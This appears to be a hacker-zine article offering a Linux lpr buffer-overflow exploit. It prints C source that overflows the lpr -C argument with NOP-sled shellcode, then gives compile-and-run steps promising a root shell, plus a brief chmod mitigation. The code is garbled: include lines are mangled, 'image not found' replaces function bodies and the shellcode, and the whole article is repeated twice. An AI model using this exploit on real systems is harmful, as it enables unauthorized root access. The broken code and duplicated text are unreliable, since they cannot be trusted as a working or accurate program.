10001: lpr Exploit
By: r3vIn this issue I'm gonna talk about some basics of getting started hax0ring. I'm gonna talk about linux buffer overflows. (If you read previous issues of DD you would know Cain gave a buffer overflow in a previous article) Now, buffer overflows are basically the most common type of exploit (I'm assuming you know the basics of *nix like ls, cp, etc. I'm also assuming you know what an exploit is.) The exploit I'm giving you this month is an lpr exploit. Now basically what this will do is, if they haven't reconfigured the system it will give you root. W00P! So this is a pretty good one. I'll tell you how to keep it from happening on your box too if you run linux... and I'll tell you how to compile it. (A note to several people who actually read this: buffer overflows are _seriously_ hard to write. You have to be extremely proficient in C to write one. )
(NOTE: I DID NOT WRITE THIS. I got it from some webpage.)
---------------------CUT HERE--------------------------
long get_esp(void)
image not found
void main()
image not found
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshelli;
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------END CUT HERE----------------------------
Now here's what ya do. You take this and save it as whatever. For demonstration purposes I will call it "lprsploit.c". Then in your shell (I'm using my box for demonstrative purposes again) type this:
Erebus:~$ gcc -o owned lprsploit.c
Then it should compile it. After it's compiled, type this:
Erebus:~$ owned
And it should give you this:
bash#
WOOP! now you're root!
Ok... now for those of you who want to secure this type this:
chmod -s /usr/bin/lpr
that will remove the suidroot perm on it. Next type this:
chmod og-rx /usr/bin/lpr
so then only root will be able to print.
That was the quick fix. The long term fix is too long to print here. Look around for it.
Well that's it for this month kiddies. C-ya around and don't get arrested.
By the way, I'm reminded... gimme some feedback on this shit ok? r3v@multic.ml.org or r3v_ball@whoever.com k?
(NOTE: I DID NOT WRITE THIS. I got it from some webpage.)
---------------------CUT HERE--------------------------
- nclude <stdio.h>
- nclude <stdlib.h>
- nclude <unistd.h>
- efine DEFAULT_OFFSET 50
- efine BUFFER_SIZE 1023
long get_esp(void)
image not found
void main()
image not found
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshelli;
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------END CUT HERE----------------------------
Now here's what ya do. You take this and save it as whatever. For demonstration purposes I will call it "lprsploit.c". Then in your shell (I'm using my box for demonstrative purposes again) type this:
Erebus:~$ gcc -o owned lprsploit.c
Then it should compile it. After it's compiled, type this:
Erebus:~$ owned
And it should give you this:
bash#
WOOP! now you're root!
Ok... now for those of you who want to secure this type this:
chmod -s /usr/bin/lpr
that will remove the suidroot perm on it. Next type this:
chmod og-rx /usr/bin/lpr
so then only root will be able to print.
That was the quick fix. The long term fix is too long to print here. Look around for it.
Well that's it for this month kiddies. C-ya around and don't get arrested.
By the way, I'm reminded... gimme some feedback on this shit ok? r3v@multic.ml.org or r3v_ball@whoever.com k?
Back Next
